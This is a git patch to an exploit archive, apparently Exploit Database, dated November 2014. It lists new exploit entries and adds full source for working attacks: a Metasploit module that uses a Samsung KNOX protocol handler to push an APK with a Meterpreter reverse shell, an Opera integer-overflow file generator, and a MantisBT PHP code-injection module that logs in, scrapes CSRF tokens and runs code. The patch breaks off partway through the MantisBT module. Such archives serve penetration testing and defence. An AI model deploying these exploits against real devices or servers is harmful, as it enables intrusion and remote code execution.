From c195143ac6409664fc8e78027c0cd54913bfc2e5 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 20 Nov 2014 04:47:03 +0000 Subject: [PATCH] Updated 11_20_2014 --- files.csv | 21 +- platforms/android/remote/35282.rb | 162 +++++++++++++ platforms/multiple/remote/35284.pl | 34 +++ platforms/php/remote/35283.rb | 290 ++++++++++++++++++++++ platforms/php/webapps/35146.txt | 22 +- platforms/php/webapps/35285.txt | 9 + platforms/php/webapps/35286.txt | 9 + platforms/php/webapps/35287.txt | 9 + platforms/php/webapps/35288.txt | 10 + platforms/php/webapps/35289.txt | 9 + platforms/php/webapps/35290.txt | 13 + platforms/php/webapps/35291.txt | 9 + platforms/php/webapps/35292.html | 16 ++ platforms/php/webapps/35293.txt | 10 + platforms/php/webapps/35294.txt | 7 + platforms/php/webapps/35295.txt | 7 + platforms/php/webapps/35296.txt | 11 + platforms/php/webapps/35297.txt | 9 + platforms/php/webapps/35298.txt | 28 +++ platforms/php/webapps/35300.txt | 9 + platforms/windows/remote/35273.html | 363 ++++++++++++++++++++++++++++ 21 files changed, 1043 insertions(+), 14 deletions(-) create mode 100755 platforms/android/remote/35282.rb create mode 100755 platforms/multiple/remote/35284.pl create mode 100755 platforms/php/remote/35283.rb create mode 100755 platforms/php/webapps/35285.txt create mode 100755 platforms/php/webapps/35286.txt create mode 100755 platforms/php/webapps/35287.txt create mode 100755 platforms/php/webapps/35288.txt create mode 100755 platforms/php/webapps/35289.txt create mode 100755 platforms/php/webapps/35290.txt create mode 100755 platforms/php/webapps/35291.txt create mode 100755 platforms/php/webapps/35292.html create mode 100755 platforms/php/webapps/35293.txt create mode 100755 platforms/php/webapps/35294.txt create mode 100755 platforms/php/webapps/35295.txt create mode 100755 platforms/php/webapps/35296.txt create mode 100755 platforms/php/webapps/35297.txt create mode 100755 platforms/php/webapps/35298.txt create mode 100755 platforms/php/webapps/35300.txt create mode 100755 platforms/windows/remote/35273.html diff --git a/files.csv b/files.csv index 6b7f7a689..b42109311 100755 --- a/files.csv +++ b/files.csv @@ -31663,7 +31663,7 @@ id,file,description,date,author,platform,type,port 35143,platforms/php/webapps/35143.txt,"HotWeb Scripts HotWeb Rentals 'PageId' Parameter SQL Injection Vulnerability",2010-12-28,"non customers",php,webapps,0 35144,platforms/multiple/remote/35144.txt,"Appweb Web Server 3.2.2-1 Cross Site Scripting Vulnerability",2010-12-23,"Gjoko Krstic",multiple,remote,0 35145,platforms/php/webapps/35145.txt,"Pligg CMS 1.1.3 'range' Parameter SQL Injection Vulnerability",2010-12-27,Dr.NeT,php,webapps,0 -35146,platforms/php/webapps/35146.txt,"PHP 5.x - Bypass Disable Functions (via Shellshock)",2014-11-03,"Ryan King (Starfall)",php,webapps,0 +35146,platforms/php/webapps/35146.txt,"PHP 5.x Shellshock Exploit (bypass disable_functions)",2014-11-03,"Ryan King (Starfall)",php,webapps,0 35148,platforms/linux/remote/35148.txt,"IBM Tivoli Access Manager 6.1.1 for e-business Directory Traversal Vulnerability",2010-12-24,anonymous,linux,remote,0 35149,platforms/php/webapps/35149.txt,"LiveZilla 3.2.0.2 'Track' Module 'server.php' Cross Site Scripting Vulnerability",2010-12-27,"Ulisses Castro",php,webapps,0 35150,platforms/php/webapps/35150.php,"Drupal < 7.32 Pre Auth SQL Injection",2014-11-03,"Stefan Horst",php,webapps,443 @@ -31767,6 +31767,7 @@ id,file,description,date,author,platform,type,port 35265,platforms/php/webapps/35265.php,"WordPress Recip.ly 1.1.7 'uploadImage.php' Arbitrary File Upload Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0 35266,platforms/php/webapps/35266.txt,"MyBB Forums 1.8.2 - Stored XSS Vulnerability",2014-11-17,"Avinash Thapa",php,webapps,0 35272,platforms/hardware/webapps/35272.txt,"ZTE ZXHN H108L - Authentication Bypass",2014-11-17,"Project Zero Labs",hardware,webapps,0 +35273,platforms/windows/remote/35273.html,"Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.1 Bypass (MS12-037)",2014-11-17,"ryujin & sickness",windows,remote,0 35274,platforms/php/webapps/35274.txt,"PHPFox - Stored XSS Vulnerability",2014-11-17,spyk2r,php,webapps,80 35275,platforms/xml/webapps/35275.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection",2014-11-17,"BGA Security",xml,webapps,80 35276,platforms/hardware/webapps/35276.txt,"ZTE ZXHN H108L - Authentication Bypass",2014-11-17,"Project Zero Labs",hardware,webapps,80 @@ -31774,3 +31775,21 @@ id,file,description,date,author,platform,type,port 35278,platforms/php/webapps/35278.txt,"Zoph 0.9.1 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",php,webapps,80 35279,platforms/osx/dos/35279.html,"Safari 8.0 / OS X 10.10 - Crash PoC",2014-11-17,w3bd3vil,osx,dos,0 35280,platforms/windows/remote/35280.txt,".NET Remoting Services Remote Command Execution",2014-11-17,"James Forshaw",windows,remote,0 +35282,platforms/android/remote/35282.rb,"Samsung Galaxy KNOX Android Browser RCE",2014-11-18,metasploit,android,remote,0 +35283,platforms/php/remote/35283.rb,"MantisBT XmlImportExport Plugin PHP Code Injection Vulnerability",2014-11-18,metasploit,php,remote,80 +35284,platforms/multiple/remote/35284.pl,"Opera Web Browser 11.00 'option' HTML Element Integer Overflow Vulnerability",2011-01-25,"C4SS!0 G0M3S",multiple,remote,0 +35285,platforms/php/webapps/35285.txt,"WordPress Feature Slideshow Plugin 1.0.6 \'src\' Parameter Cross Site Scripting Vulnerability",2011-01-24,"AutoSec Tools",php,webapps,0 +35286,platforms/php/webapps/35286.txt,"WordPress BezahlCode Generator Plugin 1.0 'gen_name' Parameter Cross Site Scripting Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0 +35287,platforms/php/webapps/35287.txt,"Powerhouse Museum Collection Image Grid 0.9.1.1 'tbpv_username' Parameter Cross Site Scripting Vulnerability",2011-01-24,"AutoSec Tools",php,webapps,0 +35288,platforms/php/webapps/35288.txt,"WordPress oQey-Gallery Plugin 0.2 'tbpv_domain' Parameter Cross Site Scripting Vulnerability",2011-01-24,"AutoSec Tools",php,webapps,0 +35289,platforms/php/webapps/35289.txt,"WordPress FCChat Widget Plugin 2.1.7 'path' Parameter Cross Site Scripting Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0 +35290,platforms/php/webapps/35290.txt,"SimpGB 1.49.2 'guestbook.php' Multiple Cross Site Scripting Vulnerabilities",2011-01-26,MustLive,php,webapps,0 +35291,platforms/php/webapps/35291.txt,"Vanilla Forums 2.0.16 'Target' Parameter Cross Site Scripting Vulnerability",2011-01-27,"YGN Ethical Hacker Group",php,webapps,0 +35292,platforms/php/webapps/35292.html,"vBSEO 3.2.2/3.5.2 Multiple Cross Site Scripting Vulnerabilities",2011-01-30,MaXe,php,webapps,0 +35293,platforms/php/webapps/35293.txt,"VirtueMart eCommerce Component 1.1.6 for Joomla! SQL Injection Vulnerability",2011-01-31,"Andrea Fabrizi",php,webapps,0 +35294,platforms/php/webapps/35294.txt,"Joomla! 'com_clan_members' Component 'id' Parameter SQL Injection Vulnerability",2011-02-01,FL0RiX,php,webapps,0 +35295,platforms/php/webapps/35295.txt,"Joomla Component 'com_frontenduseraccess' Local File Include Vulnerability",2011-02-01,wishnusakti,php,webapps,0 +35296,platforms/php/webapps/35296.txt,"eSyndiCat Directory Software 2.2/2.3 'preview' Parameter Cross Site Scripting Vulnerability",2011-01-30,"Avram Marius",php,webapps,0 +35297,platforms/php/webapps/35297.txt,"Moodle 2.0.1 'PHPCOVERAGE_HOME' Cross Site Scripting Vulnerability",2011-02-01,"AutoSec Tools",php,webapps,0 +35298,platforms/php/webapps/35298.txt,"TinyWebGallery 1.8.3 Cross Site Scripting and Local File Include Vulnerabilities",2011-02-01,"Yam Mesicka",php,webapps,0 +35300,platforms/php/webapps/35300.txt,"WordPress TagNinja Plugin 1.0 'id' Parameter Cross Site Scripting Vulnerability",2011-02-01,"AutoSec Tools",php,webapps,0 diff --git a/platforms/android/remote/35282.rb b/platforms/android/remote/35282.rb new file mode 100755 index 000000000..8b0c3e25d --- /dev/null +++ b/platforms/android/remote/35282.rb @@ -0,0 +1,162 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'digest/md5' + +class Metasploit3 < Msf::Exploit::Remote + + include Msf::Exploit::Remote::BrowserExploitServer + + # Hash that maps payload ID -> (0|1) if an HTTP request has + # been made to download a payload of that ID + attr_reader :served_payloads + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Samsung Galaxy KNOX Android Browser RCE', + 'Description' => %q{ + A vulnerability exists in the KNOX security component of the Samsung Galaxy + firmware that allows a remote webpage to install an APK with arbitrary + permissions by abusing the 'smdm://' protocol handler registered by the KNOX + component. + + The vulnerability has been confirmed in the Samsung Galaxy S4, S5, Note 3, + and Ace 4. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'Andre Moulu', # discovery and advisory + 'joev' # msf module + ], + 'References' => [ + ['URL', 'http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html'], + ['OSVDB', '114590'] + ], + 'Platform' => 'android', + 'Arch' => ARCH_DALVIK, + 'DefaultOptions' => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp' }, + 'Targets' => [ [ 'Automatic', {} ] ], + 'DisclosureDate' => 'Nov 12 2014', + 'DefaultTarget' => 0, + + 'BrowserRequirements' => { + :source => 'script', + :os_name => OperatingSystems::Match::ANDROID + } + )) + + register_options([ + OptString.new('APK_VERSION', [ + false, "The update version to advertise to the client", "1337" + ]) + ], self.class) + + deregister_options('JsObfuscate') + end + + def exploit + @served_payloads = Hash.new(0) + super + end + + def apk_bytes + payload.encoded + end + + def on_request_uri(cli, req) + if req.uri =~ /\/([a-zA-Z0-9]+)\.apk\/latest$/ + if req.method.upcase == 'HEAD' + print_status "Serving metadata..." + send_response(cli, '', magic_headers) + else + print_status "Serving payload '#{$1}'..." + @served_payloads[$1] = 1 + send_response(cli, apk_bytes, magic_headers) + end + elsif req.uri =~ /_poll/ + vprint_debug "Polling #{req.qstring['id']}: #{@served_payloads[req.qstring['id']]}" + send_response(cli, @served_payloads[req.qstring['id']].to_s, 'Content-type' => 'text/plain') + elsif req.uri =~ /launch$/ + send_response_html(cli, launch_html) + else + super + end + end + + # The browser appears to be vulnerable, serve the exploit + def on_request_exploit(cli, req, browser) + print_status "Serving exploit..." + send_response_html(cli, generate_html) + end + + def magic_headers + { 'Content-Length' => apk_bytes.length, + 'ETag' => Digest::MD5.hexdigest(apk_bytes), + 'x-amz-meta-apk-version' => datastore['APK_VERSION'] } + end + + def generate_html + %Q| + + + + | + end + + def exploit_js + payload_id = rand_word + + js_obfuscate %Q| + + function poll() { + var xhr = new XMLHttpRequest(); + xhr.open('GET', '_poll?id=#{payload_id}&d='+Math.random()*999999999999); + xhr.onreadystatechange = function(){ + if (xhr.readyState == 4) { + if (xhr.responseText == '1') { + setTimeout(killEnrollment, 100); + } else { + setTimeout(poll, 1000); + setTimeout(enroll, 0); + setTimeout(enroll, 500); + } + } + }; + xhr.onerror = function(){ + setTimeout(poll, 1000); + setTimeout(enroll, 0); + }; + xhr.send(); + } + + function enroll() { + var loc = window.location.href.replace(/[/.]$/g, ''); + top.location = 'smdm://#{rand_word}?update_url='+ + encodeURIComponent(loc)+'/#{payload_id}.apk'; + } + + function killEnrollment() { + top.location = "intent://#{rand_word}?program="+ + "#{rand_word}/#Intent;scheme=smdm;launchFlags=268468256;end"; + setTimeout(launchApp, 300); + } + + function launchApp() { + top.location='intent:view#Intent;SEL;component=com.metasploit.stage/.MainActivity;end'; + } + + enroll(); + setTimeout(poll,600); + + | + end + + def rand_word + Rex::Text.rand_text_alphanumeric(3+rand(12)) + end +end \ No newline at end of file diff --git a/platforms/multiple/remote/35284.pl b/platforms/multiple/remote/35284.pl new file mode 100755 index 000000000..db8d98306 --- /dev/null +++ b/platforms/multiple/remote/35284.pl @@ -0,0 +1,34 @@ +source: http://www.securityfocus.com/bid/46003/info + +Opera Web Browser is prone to a remote integer-overflow vulnerability. + +Successful exploits will allow an attacker to run arbitrary code in the context of the user running the application. Failed attacks will cause denial-of-service conditions. + +Opera 11.00 is vulnerable; other versions may also be affected. + +print "[*]Creating the Exploit\n" +i = 0 +buf = "\n" + +while i<0x4141 + buf += "\n" + i+=1 +end + +HTML = +"\n"+ +"\n\n"+ +"\n\n"+ +"\n\n\n"+ +"\n\n\n\n\n" + +f = File.open("Exploit_opera_11.00.html","w") +f.puts HTML +f.close +puts "\n\n\[*]File Created With Sucess" +sleep(1) +puts "[*]Go to my Site www.invasao.com.br!" +sleep(1) diff --git a/platforms/php/remote/35283.rb b/platforms/php/remote/35283.rb new file mode 100755 index 000000000..11c3e4934 --- /dev/null +++ b/platforms/php/remote/35283.rb @@ -0,0 +1,290 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'MantisBT XmlImportExport Plugin PHP Code Injection Vulnerability', + 'Description' => %q{ + This module exploits a post-auth vulnerability found in MantisBT versions 1.2.0a3 up to 1.2.17 when the Import/Export plugin is installed. + The vulnerable code exists on plugins/XmlImportExport/ImportXml.php, which receives user input through the "description" field and the "issuelink" attribute of an uploaded XML file and passes to preg_replace() function with the /e modifier. + This allows a remote authenticated attacker to execute arbitrary PHP code on the remote machine. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Egidio Romano', # discovery http://karmainsecurity.com + 'Juan Escobar ', # module development @itsecurityco + ], + 'References' => + [ + ['CVE', '2014-7146'] + ], + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => [['Generic (PHP Payload)', {}]], + 'DisclosureDate' => 'Nov 8 2014', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('USERNAME', [ true, 'Username to authenticate as', 'administrator']), + OptString.new('PASSWORD', [ true, 'Pasword to authenticate as', 'root']), + OptString.new('TARGETURI', [ true, 'Base directory path', '/']) + ], self.class) + end + + def check + res = exec_php('phpinfo(); die();', true) + + if res && res.body =~ /This program makes use of the Zend/ + return Exploit::CheckCode::Vulnerable + else + return Exploit::CheckCode::Unknown + end + end + + def do_login() + print_status('Checking access to MantisBT...') + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'login_page.php'), + 'vars_get' => { + 'return' => normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import') + } + }) + + fail_with(Failure::NoAccess, 'Error accessing MantisBT') unless res && res.code == 200 + + session_cookie = res.get_cookies + + print_status('Logging in...') + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'login.php'), + 'cookie' => session_cookie, + 'vars_post' => { + 'return' => normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import'), + 'username' => datastore['username'], + 'password' => datastore['password'], + 'secure_session' => 'on' + } + }) + + + fail_with(Failure::NoAccess, 'Login failed') unless res && res.code == 302 + + fail_with(Failure::NoAccess, 'Wrong credentials') unless res.redirection.to_s !~ /login_page.php/ + + "#{session_cookie} #{res.get_cookies}" + end + + def upload_xml(payload_b64, rand_text, cookies, is_check) + + if is_check + timeout = 20 + else + timeout = 3 + end + + rand_num = Rex::Text.rand_text_numeric(1, 9) + + print_status('Checking XmlImportExport plugin...') + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'plugin.php'), + 'cookie' => cookies, + 'vars_get' => { + 'page' => 'XmlImportExport/import' + } + }) + + unless res && res.code == 200 + print_error('Error trying to access XmlImportExport/import page...') + return false + end + + # Retrieving CSRF token + if res.body =~ /name="plugin_xml_import_action_token" value="(.*)"/ + csrf_token = Regexp.last_match[1] + else + print_error('Error trying to read CSRF token') + return false + end + + # Retrieving default project id + if res.body =~ /name="project_id" value="([0-9]+)"/ + project_id = Regexp.last_match[1] + else + print_error('Error trying to read project id') + return false + end + + # Retrieving default category id + if res.body =~ /name="defaultcategory">[.|\r|\r\n]*